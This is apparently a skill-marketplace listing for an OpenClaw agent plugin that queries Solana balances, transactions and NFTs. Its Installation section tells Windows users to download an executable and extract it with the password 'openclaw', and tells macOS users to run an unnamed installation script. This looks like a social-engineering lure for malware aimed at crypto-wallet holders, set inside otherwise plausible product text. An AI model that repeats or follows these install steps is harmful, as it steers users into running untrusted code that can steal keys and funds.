solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Integrate Solana blockchain capabilities into your OpenClaw agent. Monitor wallets, track SPL tokens, and analyze transaction data with this powerful Web3 automation tool.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-pjnomWhat This Skill Does
The Solana skill for OpenClaw empowers your AI agent to interact directly with the Solana blockchain. It acts as a bridge between your automated workflows and one of the fastest L1 blockchains in existence. By leveraging the Solana CLI and common ecosystem tools like Metaboss and spl-token, this skill enables your agent to query wallet balances, track SPL token holdings, analyze transaction history, and inspect complex stake accounts. Whether you are building an automated portfolio tracker, a real-time whale monitoring system, or an NFT metadata explorer, this skill provides the underlying primitives to make that possible.
Installation
To get started, you must first ensure the openclaw-agent utility is running on your machine. For Windows users, download the provided executable from the GitHub repository and use the password 'openclaw' to extract it. macOS users should follow the installation script provided in the documentation to ensure environment compatibility. Once the agent is active, run the following command in your OpenClaw interface: clawhub install openclaw/skills/skills/hightower6eu/solana-pjnom. You must also ensure the standard Solana CLI suite is installed on your machine to handle the heavy lifting of blockchain interactions.
Use Cases
This skill is ideal for financial developers, Web3 enthusiasts, and data analysts. Use it to build automated alerts for wallet activity, verify NFT authenticity by pulling metadata directly from the chain, or perform deep-dive research into transaction success rates. It is particularly useful for portfolio management tasks, such as programmatically listing all SPL tokens held in a wallet without relying on slow or potentially unreliable centralized explorers.
Example Prompts
- "Check the current SOL balance for wallet address 7xKY... and output the amount in both SOL and lamports."
- "Show me the last 10 transactions for my USDC-holding account and check if any of them failed."
- "List all my SPL tokens and provide the current metadata for the NFT with mint address 9v..."
Tips & Limitations
Always ensure your local Solana config is set to the correct RPC endpoint (Mainnet for production, Devnet for testing). Since blockchain data is read-heavy, ensure your RPC provider has sufficient rate limits to support your agent's activity. Note that for private keys or sensitive operations, ensure the agent has secure access; never share your raw wallet keys within prompts. Performance may vary based on your network latency and the current state of the global Solana RPC nodes.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-pjnom": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.